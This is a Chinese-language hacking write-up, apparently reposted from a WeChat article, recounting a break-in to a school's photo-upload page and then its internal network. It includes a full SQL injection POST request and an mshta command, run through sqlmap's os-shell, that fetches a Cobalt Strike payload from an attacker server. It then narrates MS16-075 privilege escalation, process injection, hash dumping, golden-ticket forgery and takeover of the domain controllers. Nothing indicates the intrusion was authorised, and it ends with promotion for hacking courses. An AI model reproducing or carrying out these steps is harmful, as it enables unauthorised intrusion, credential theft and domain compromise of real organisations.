观看更多零基础黑客教程,黑客圈新闻,安全面试经验,实战技术文
目标站:www.xxxxx.xx
脆弱点:http://www.xxxxx.xx/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp
SQL注入POST包:
<code>
POST /PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp HTTP/1.1Host: www.xxxxx.xxContent-Length: 31Cache-Control: max-age=0Origin: http://www.xxxxx.xxUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://www.xxxxx.xx/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.aspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: ASPSESSIONIDQCABSDCS=DBGDAIKBDEHOPFOFPEAPPLBBConnection: closetxtSchoolYear=108B&txtStdID=1234/<code>
权限:DBA(SA)
内网横向
CS设置好HTTPS监听器,生成一个html application文件
然后传到CS服务器上
sqlmap在os-shell下执行mshta http://20*.*.*.2*:80/download/file.txt
过一会有台主机上线了
设置好beacon回连时间后检查下服务器的环境
存在域
补丁安装的较多
复制信息到https://bugs.hacking8.com/tiquan/检查下有没有漏补的
发现漏补MS16-075
在github上找到了该exp的cna插件https://github.com/vysecurity/reflectivepotato.git
clone回来加载到CS里
获取到了system权限的beacon
需要注意的是目前进程的父进程是mssql,需要注入到其他用户的进程下,否则执行一些命令时会提示权限不够
选择了WEGO的用户注入
查看域控
根据备注,判断AD1为主域控,AD2、AD3为辅域控
抓下hash然后备用
接管域控
利用抓到的hash伪造金票
然后接管AD1
再从AD1上抓hash
在AD1上抓到了域管的明文密码
然后批量梭哈
拿下运维机
给萌新的一句话:
学习网络安全没有你相对那么难,却也没有你想的那么容易,关键看你怎么学
免费观看在线实战渗透教程,体系化视频提供了,想不想学看你
转载自:https://mp.weixin.qq.com/s/zcJE7M0BuBJVa8PCV5lxWQ
閱讀更多 暗網視界 的文章